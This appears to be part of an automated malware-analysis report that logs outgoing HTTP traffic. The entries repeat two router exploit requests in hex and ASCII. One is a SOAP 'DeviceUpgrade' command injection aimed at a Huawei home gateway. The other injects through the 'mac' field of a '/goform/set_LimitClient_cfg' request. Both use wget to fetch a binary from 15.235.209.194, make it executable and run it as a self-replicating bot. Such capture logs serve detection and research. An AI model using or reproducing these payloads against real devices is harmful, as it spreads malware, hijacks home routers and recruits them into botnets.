                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
